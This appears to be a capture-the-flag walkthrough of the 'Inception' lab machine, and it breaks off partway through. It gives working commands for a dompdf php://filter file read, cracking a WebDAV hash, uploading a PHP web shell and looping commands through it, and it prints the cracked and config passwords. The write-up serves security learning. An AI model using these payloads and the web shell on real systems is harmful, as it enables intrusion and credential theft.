I"}€<h1 id="enumeration">Enumeration</h1>
<h2 id="masscan--nmap">Masscan + Nmap</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>masscan <span class="nt">-p1-65535</span>,U:1-65535 <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">--rate</span><span class="o">=</span>10000 <span class="nt">-e</span> tun0 | <span class="nb">tee </span>masscan.out
Discovered open port 3128/tcp on 10.10.10.67
Discovered open port 80/tcp on 10.10.10.67
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Parse those ports to nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre><span class="nv">ports</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat </span>masscan.out |awk <span class="s1">'{ print $4 }'</span> | <span class="nb">sed</span> <span class="s1">'s/\/tcp//;s/\/udp//'</span> | <span class="nb">tr</span> <span class="s1">'\n'</span> <span class="s1">','</span> | <span class="nb">sed</span> <span class="s1">'s/,$//'</span><span class="si">)</span>
nmap <span class="nt">-v</span> <span class="nt">-sVC</span> <span class="nt">--min-rate</span> 1000 <span class="nt">-p</span> <span class="nv">$ports</span> <span class="sb">`</span>IP<span class="sb">`</span> <span class="nt">-oN</span> nmap-fullscan.out
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="apache-port-80">Apache Port 80</h2>
<p>Directory brute forcing:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>ffuf <span class="nt">-u</span> http://inception.htb/FUZZ <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt <span class="nt">-e</span> .txt,.php,.html <span class="nt">-of</span> md <span class="nt">-o</span> ffuf.out <span class="nt">-fc</span> 401,403,405
</pre></td></tr></tbody></table></code></pre></div></div>

<table>
  <thead>
    <tr>
      <th>FUZZ</th>
      <th>URL</th>
      <th>Redirectlocation</th>
      <th>Position</th>
      <th>Status Code</th>
      <th>Content Length</th>
      <th>Content Words</th>
      <th>Content Lines</th>
      <th>Content Type</th>
      <th>¬†</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>images</td>
      <td>http://inception.htb/images</td>
      <td>http://inception.htb/images/</td>
      <td>9</td>
      <td>301</td>
      <td>315</td>
      <td>20</td>
      <td>10</td>
      <td>text/html; charset=iso-8859-1</td>
      <td>¬†</td>
    </tr>
    <tr>
      <td>index.html</td>
      <td>http://inception.htb/index.html</td>
      <td>¬†</td>
      <td>64</td>
      <td>200</td>
      <td>2877</td>
      <td>124</td>
      <td>1052</td>
      <td>text/html</td>
      <td>¬†</td>
    </tr>
    <tr>
      <td>LICENSE.txt</td>
      <td>http://inception.htb/LICENSE.txt</td>
      <td>¬†</td>
      <td>254</td>
      <td>200</td>
      <td>17128</td>
      <td>2798</td>
      <td>64</td>
      <td>text/plain</td>
      <td>¬†</td>
    </tr>
    <tr>
      <td>assets</td>
      <td>http://inception.htb/assets</td>
      <td>http://inception.htb/assets/</td>
      <td>657</td>
      <td>301</td>
      <td>315</td>
      <td>20</td>
      <td>10</td>
      <td>text/html; charset=iso-8859-1</td>
      <td>¬†</td>
    </tr>
    <tr>
      <td>.</td>
      <td>http://inception.htb/.</td>
      <td>¬†</td>
      <td>1597</td>
      <td>200</td>
      <td>2877</td>
      <td>124</td>
      <td>1052</td>
      <td>text/html</td>
      <td>¬†</td>
    </tr>
  </tbody>
</table>

<p>There‚Äôs nothing much in any url.
 But index.html does have a lot of empty lines and at the end it contains the string:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>curl http://inception.htb/


&lt;<span class="o">!</span><span class="nt">--</span> Todo: <span class="nb">test </span>dompdf on php 7.x <span class="nt">--</span><span class="o">&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Visiting /dompdf gives:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre><span class="k">******</span> Index of /dompdf <span class="k">******</span>
<span class="o">[[</span>ICO]]       Name                         Last_modified    Size Description
<span class="o">============================================================================</span>
<span class="o">[[</span>PARENTDIR]] Parent_Directory             ¬†                  - ¬†
<span class="o">[[</span>   <span class="o">]]</span>       CONTRIBUTING.md              2014-01-26 20:25 3.1K ¬†
<span class="o">[[</span>   <span class="o">]]</span>       LICENSE.LGPL                 2013-05-24 03:47  24K ¬†
<span class="o">[[</span>   <span class="o">]]</span>       README.md                    2014-02-07 03:30 4.8K ¬†
<span class="o">[[</span>   <span class="o">]]</span>       VERSION                      2014-02-07 06:35    5 ¬†
<span class="o">[[</span>   <span class="o">]]</span>       composer.json                2014-02-02 08:33  559 ¬†
<span class="o">[[</span>   <span class="o">]]</span>       dompdf.php                   2013-05-24 03:47 6.9K ¬†
<span class="o">[[</span>   <span class="o">]]</span>       dompdf_config.custom.inc.php 2013-11-07 04:45 1.2K ¬†
<span class="o">[[</span>   <span class="o">]]</span>       dompdf_config.inc.php        2017-11-06 02:21  13K ¬†
<span class="o">[[</span>DIR]]       include/                     2014-02-08 01:00    - ¬†
<span class="o">[[</span>DIR]]       lib/                         2014-02-08 01:00    - ¬†
<span class="o">[[</span>   <span class="o">]]</span>       load_font.php                2013-05-24 03:47 5.2K ¬†
<span class="o">============================================================================</span>
     Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> Server at inception.htb Port 80
</pre></td></tr></tbody></table></code></pre></div></div>
<p>VERSION file says 0.6.0.</p>

<h1 id="foothold">Foothold</h1>
<p>Running searchsploit on <code class="language-plaintext highlighter-rouge">dompdf 0.6.0</code> gives:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>searchsploit dompdf 0.6.0
<span class="nt">-----------------------------------------------------------</span> <span class="nt">---------------------------------</span>
 Exploit Title          							       |  Path
<span class="nt">-----------------------------------------------------------</span> <span class="nt">---------------------------------</span>
dompdf 0.6.0 - <span class="s1">'dompdf.php?read'</span> Arbitrary File Read       | php/webapps/33004.txt
dompdf 0.6.0 beta1 - Remote File Inclusion  		       | php/webapps/14851.txt
<span class="nt">-----------------------------------------------------------</span> <span class="nt">---------------------------------</span>
Shellcodes: No Results
</pre></td></tr></tbody></table></code></pre></div></div>

<p><strong>Let‚Äôs try with the arbitrary file read.</strong></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre>An arbitrary file <span class="nb">read </span>vulnerability is present on dompdf.php file that
allows remote or <span class="nb">local </span>attackers to <span class="nb">read local </span>files using a special
crafted argument. This vulnerability requires the configuration flag
DOMPDF_ENABLE_PHP to be enabled <span class="o">(</span>which is disabled by default<span class="o">)</span><span class="nb">.</span>

Using PHP protocol and wrappers it is possible to bypass the dompdf<span class="s1">'s
"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing
system files or other files on the webserver. Please note that the flag
DOMPDF_ENABLE_REMOTE needs to be enabled.

Command line interface:
php dompdf.php
php://filter/read=convert.base64-encode/resource=&lt;PATH_TO_THE_FILE&gt;

Web interface:

http://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=&lt;PATH_TO_THE_FILE&gt;
</span></pre></td></tr></tbody></table></code></pre></div></div>
<p>So even if <code class="language-plaintext highlighter-rouge">DOMPDF_CHROOT</code> is set to any directory, we can access the whole file-system using php wrappers. Also <code class="language-plaintext highlighter-rouge">DOMPDF_ENABLE_REMOTE</code> is enabled which is required here.</p>

<p>To get <code class="language-plaintext highlighter-rouge">/etc/passwd</code>, I used the below command. It fetches the url with <code class="language-plaintext highlighter-rouge">curl</code>, returns a PDF containing a <code class="language-plaintext highlighter-rouge">base64</code> encoded string having the file contents, which is then decoded:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ file</span><span class="o">=</span><span class="s1">'/etc/passwd'</span><span class="p">;</span>curl <span class="nt">-s</span> http://inception.htb/dompdf/dompdf.php?input_file<span class="o">=</span>php://filter/read<span class="o">=</span>convert.base64-encode/resource<span class="o">=</span><span class="nv">$file</span> | strings <span class="nt">-n</span> 50 | <span class="nb">awk</span> <span class="nt">-F</span><span class="s1">'('</span> <span class="s1">'{print $2}'</span> | <span class="nb">awk</span> <span class="nt">-F</span><span class="s1">')'</span> <span class="s1">'{print $1}'</span>  | <span class="nb">base64</span> <span class="nt">-d</span>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<span class="nb">sync</span>:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
cobb:x:1000:1000::/home/cobb:/bin/bash
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I tried for Remote file Inclusion, but that didn‚Äôt work for me. Also to execute php code on the application, I need the permissions but after fetching the config file <code class="language-plaintext highlighter-rouge">dompdf_config.inc.php</code>, it shows that php is disabled.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre> <span class="k">*</span> This is a security risk.  Set this option to <span class="nb">false </span><span class="k">if </span>you wish to process
 <span class="k">*</span> untrusted documents.
 <span class="k">*</span>/
def<span class="o">(</span><span class="s2">"DOMPDF_ENABLE_PHP"</span>, <span class="nb">false</span><span class="o">)</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Tried fetching:
<code class="language-plaintext highlighter-rouge">/var/log/apache2/access.log</code> - Nothing returned.
<code class="language-plaintext highlighter-rouge">/var/log/apache/access.log</code> - Nothing returned.
<code class="language-plaintext highlighter-rouge">/proc/self/environ</code> - Nothing returned.
<code class="language-plaintext highlighter-rouge">/var/www/html/dompdf/dompdf_config.inc.php</code> - Contains username and password as <code class="language-plaintext highlighter-rouge">user:password</code>
<code class="language-plaintext highlighter-rouge">/etc/apache2/apache2.conf</code> - Gave output.
<code class="language-plaintext highlighter-rouge">/etc/apache2/conf-enabled/security.conf</code> - Gave output.
<code class="language-plaintext highlighter-rouge">/etc/squid/passwd</code> - Nothing returned.
<code class="language-plaintext highlighter-rouge">/etc/apache2/sites-enabled/000-default.conf</code> and <code class="language-plaintext highlighter-rouge">/etc/apache2/sites-available/000-default.conf</code> :</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td> --><td class="rouge-code"><pre>&lt;VirtualHost <span class="k">*</span>:80&gt;

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        ErrorLog <span class="k">${</span><span class="nv">APACHE_LOG_DIR</span><span class="k">}</span>/error.log
        CustomLog <span class="k">${</span><span class="nv">APACHE_LOG_DIR</span><span class="k">}</span>/access.log combined

        Alias /webdav_test_inception /var/www/html/webdav_test_inception
        &lt;Location /webdav_test_inception&gt;
                Options FollowSymLinks
                DAV On
                AuthType Basic
                AuthName <span class="s2">"webdav test credential"</span>
                AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
                Require valid-user
        &lt;/Location&gt;
&lt;/VirtualHost&gt;
</pre></td></tr></tbody></table></code></pre></div></div>

<p>This file mentions something about:</p>
<ul>
  <li>Virtualhosting being done at port 80 by server-admin <code class="language-plaintext highlighter-rouge">webmaster@localhost</code>.</li>
  <li>Webroot is <code class="language-plaintext highlighter-rouge">/var/www/html</code></li>
  <li>webdav test credentials residing in <code class="language-plaintext highlighter-rouge">/var/www/html/webdav_test_inception/webdav.passwd</code></li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ file</span><span class="o">=</span><span class="s1">'/var/www/html/webdav_test_inception/webdav.passwd'</span><span class="p">;</span>curl <span class="nt">-s</span> http://inception.htb/dompdf/dompdf.php?input_file<span class="o">=</span>php://filter/read<span class="o">=</span>convert.base64-encode/resource<span class="o">=</span><span class="nv">$file</span> | strings <span class="nt">-n</span> 50 | <span class="nb">awk</span> <span class="nt">-F</span><span class="s1">'('</span> <span class="s1">'{print $2}'</span> | <span class="nb">awk</span> <span class="nt">-F</span><span class="s1">')'</span> <span class="s1">'{print $1}'</span>  | <span class="nb">base64</span> <span class="nt">-d</span> | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'#'</span>/inception.htb/dompdf/dompdf.php?input_file<span class="o">=</span>php://filter/read<span class="o">=</span>convert.base64-encode/r
webdav_tester:<span class="nv">$apr1$8rO7Smi4$yqn7H</span>.GvJFtsTou1a7VME0
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Cracking hash with <code class="language-plaintext highlighter-rouge">john</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>john <span class="nb">hash</span> <span class="nt">-w</span>:/usr/share/wordlists/rockyou.txt
Warning: detected <span class="nb">hash type</span> <span class="s2">"md5crypt"</span>, but the string is also recognized as <span class="s2">"md5crypt-long"</span>
Use the <span class="s2">"--format=md5crypt-long"</span> option to force loading these as that <span class="nb">type </span>instead
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>md5crypt, crypt<span class="o">(</span>3<span class="o">)</span> <span class="nv">$1$ </span><span class="o">(</span>and variants<span class="o">)</span> <span class="o">[</span>MD5 256/256 AVX2 8x3]<span class="o">)</span>
Will run 2 OpenMP threads
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
babygurl69       <span class="o">(</span>webdav_tester<span class="o">)</span>
1g 0:00:00:00 DONE <span class="o">(</span>2021-07-28 18:32<span class="o">)</span> 3.333g/s 74880p/s 74880c/s 74880C/s mondragon..220190
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I was adding <code class="language-plaintext highlighter-rouge">webmaster@localhost</code> to my /etc/hosts first as it said something of virtual-hosting; being dumb. (@localhost will always try to fetch local server)
I got hostname through <code class="language-plaintext highlighter-rouge">/etc/hosts</code> as <code class="language-plaintext highlighter-rouge">Inception</code>, I added <code class="language-plaintext highlighter-rouge">webmaster@inception</code> to my /etc/hosts. That made no change that‚Äôs because there isn‚Äôt any hostname defined as such webmaster@localhost is just the admin for webdav and not a host.</p>

<p>Accessing <a href="http://inception.htb/webdav_test_inception">http://inception.htb/webdav_test_inception</a> prompted me for an authentication.
Giving username and password as <code class="language-plaintext highlighter-rouge">webdav_tester:babygurl69</code> works well.</p>

<p>But after logging in, it gives 403 forbidden message:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>curl http://webdav_tester:babygurl69@inception.htb/webdav_test_inception/
&lt;<span class="o">!</span>DOCTYPE HTML PUBLIC <span class="s2">"-//IETF//DTD HTML 2.0//EN"</span><span class="o">&gt;</span>
&lt;html&gt;&lt;<span class="nb">head</span><span class="o">&gt;</span>
&lt;title&gt;403 Forbidden&lt;/title&gt;
&lt;/head&gt;&lt;body&gt;
&lt;h1&gt;Forbidden&lt;/h1&gt;
&lt;p&gt;You don<span class="s1">'t have permission to access /webdav_test_inception/
on this server.&lt;br /&gt;
&lt;/p&gt;
&lt;hr&gt;
&lt;address&gt;Apache/2.4.18 (Ubuntu) Server at inception.htb Port 80&lt;/address&gt;
&lt;/body&gt;&lt;/html&gt;
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="failed-forbidden-bypass-with-squid-proxy">Failed forbidden bypass with squid-proxy</h1>
<p>This didn‚Äôt work as there wasn‚Äôt any forbidden rules in configuration <code class="language-plaintext highlighter-rouge">/etc/apache2/sites-available/000-default.conf</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>        &lt;Location /webdav_test_inception&gt;
                Options FollowSymLinks
                DAV On
                AuthType Basic
                AuthName <span class="s2">"webdav test credential"</span>
                AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
                Require valid-user
        &lt;/Location&gt;
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Even though there weren‚Äôt any allow or deny rules for IP‚Äôs, I did try to bypass the forbidden page using the squid-proxy running on port 3128.
You can do this by:</p>
<ul>
  <li>Edit ‚Äì&gt; Preferences ‚Äì&gt; Advanced ‚Äì&gt; Network ‚Äì&gt; Settings and then select ‚ÄúManual proxy configuration‚Äù and enter proxy server IP address (10.10.10.67) and Port (3128) to be used for all protocol including SOCKSv5.</li>
  <li>You can try using foxy-proxy extension, here you can even specify a username and password for squid proxy.</li>
  <li>Edit /etc/proxychains.conf and add <code class="language-plaintext highlighter-rouge">http 10.10.10.67 3128 webdav_tester babygurl69</code> then you can send requests as:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>proxychains curl http://10.10.10.67/webdav_test_inception/
ProxyChains-3.1 <span class="o">(</span>http://proxychains.sf.net<span class="o">)</span>
|S-chain|-&lt;<span class="o">&gt;</span><span class="nt">-10</span>.10.10.67:3128-&lt;<span class="o">&gt;</span>&lt;<span class="o">&gt;</span><span class="nt">-10</span>.10.10.67:80-&lt;<span class="nt">--denied</span>
curl: <span class="o">(</span>7<span class="o">)</span> Couldn<span class="s1">'t connect to server
</span></pre></td></tr></tbody></table></code></pre></div>    </div>
    <p>Which shows that even after proxy-ing traffic from squid, It wasn‚Äôt able to access the server.</p>
    <h1 id="webdav">WebDAV</h1>
    <p>If I check for OPTIONS allowed by <code class="language-plaintext highlighter-rouge">/webdav_test_inception/</code> it gives: <code class="language-plaintext highlighter-rouge">Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK</code> and for a random page like <code class="language-plaintext highlighter-rouge">zzz</code> it gives <code class="language-plaintext highlighter-rouge">OPTIONS,MKCOL,PUT,LOCK</code>.
That clearly shows we can write files onto the server.</p>
  </li>
</ul>

<p>I can try something like <code class="language-plaintext highlighter-rouge">davtest</code> to upload several files with different extensions and check if the extension is executed:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>davtest <span class="nt">-auth</span> webdav_tester:babygurl69 <span class="nt">-sendbd</span> auto <span class="nt">-url</span> http://inception.htb/webdav_test_inception/
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.txt
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.php
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.asp
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.jsp
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.pl
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.aspx
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.cfm
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.html
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.cgi
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.shtml
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.jhtml
Executes: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.txt
Executes: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.php
Executes: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/davtest_yY8ocCsJAt6.html
PUT Shell: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/yY8ocCsJAt6_php_cmd.php
PUT Shell: http://inception.htb/webdav_test_inception/DavTestDir_yY8ocCsJAt6/yY8ocCsJAt6_php_backdoor.php
</pre></td></tr></tbody></table></code></pre></div></div>
<p>So I can upload any file and even execute php files.
If this wouldn‚Äôt have worked, I would‚Äôve tried for something like upload .txt files and then renaming it to .php.
I won‚Äôt use the webshell <code class="language-plaintext highlighter-rouge">davtest</code> uploaded.</p>

<p>I can use something like <code class="language-plaintext highlighter-rouge">cadaver</code> to upload files:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>cadaver http://inception.htb/webdav_test_inception/
Authentication required <span class="k">for </span>webdav <span class="nb">test </span>credential on server <span class="sb">`</span>inception.htb<span class="s1">':
Username: webdav_tester
Password:
dav:/webdav_test_inception/&gt; put /opt/phprev.php
Uploading /opt/phprev.php to `/webdav_test_inception/phprev.php'</span>:
Progress: <span class="o">[=============================&gt;]</span> 100.0% of 3462 bytes succeeded.
</pre></td></tr></tbody></table></code></pre></div></div>
<p>or 
I made a file call shell.php with contents:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="cp">&lt;?php</span> <span class="nb">system</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span><span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>and then uploaded it to the server:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>curl <span class="nt">-XPUT</span> <span class="nt">-T</span> ./shell.php http://inception.htb/webdav_test_inception/shell.php <span class="nt">-u</span> webdav_tester:babygurl69
<span class="k">******</span> 201 Created <span class="k">******</span>
Resource /webdav_test_inception/shell.php has been created.
<span class="o">===============================================================================</span>
     Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> Server at inception.htb Port 80

<span class="nv">$ </span>curl <span class="nt">-u</span> webdav_tester:babygurl69 http://inception.htb/webdav_test_inception/shell.php?cmd<span class="o">=</span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>This is a simple workaround I did as I wasn‚Äôt able to spawn a reverse shell.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre>root@TheCaretaker:~/<span class="nv">$ </span><span class="k">while </span><span class="nb">read </span>i<span class="p">;</span> <span class="k">do </span>curl <span class="nt">-u</span> webdav_tester:babygurl69 <span class="s1">'http://inception.htb/webdav_test_inception/shell.php'</span> <span class="nt">-G</span> <span class="nt">--data-urlencode</span> <span class="s2">"cmd=</span><span class="nv">$i</span><span class="s2">"</span><span class="p">;</span> <span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'$ '</span><span class="p">;</span><span class="k">done</span>
<span class="nv">$ </span><span class="nb">pwd</span>
/var/www/html/webdav_test_inception
<span class="nv">$ </span><span class="nb">ls</span> ..
LICENSE.txt
README.txt
assets
dompdf
images
index.html
latest.tar.gz
webdav_test_inception
wordpress_4.8.3

<span class="nv">$ </span><span class="nb">cat</span> ../wordpress_4.8.3/wp-config.php | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'\*'</span>
&lt;?php
define<span class="o">(</span><span class="s1">'DB_NAME'</span>, <span class="s1">'wordpress'</span><span class="o">)</span><span class="p">;</span>
define<span class="o">(</span><span class="s1">'DB_USER'</span>, <span class="s1">'root'</span><span class="o">)</span><span class="p">;</span>
define<span class="o">(</span><span class="s1">'DB_PASSWORD'</span>, <span class="s1">'VwPddNh7xMZyDQoByQL4'</span><span class="o">)</span><span class="p">;</span>
define<span class="o">(</span><span class="s1">'DB_HOST'</span>, <span class="s1">'localhost'</span><span class="o">)</span><span class="p">;</span>
define<span class="o">(</span><span class="s1">'DB_CHARSET'</span>, <span class="s1">'utf8'</span><span class="o">)</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="ssh-via-squid-proxy">SSH via squid proxy</h1>
<p>So I have valid credentials, for MySQL but it isn‚Äôt running on the host:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>netstat <span class="nt">-tulpn</span>
Active Internet connections <span class="o">(</span>only servers<span class="o">)</span>
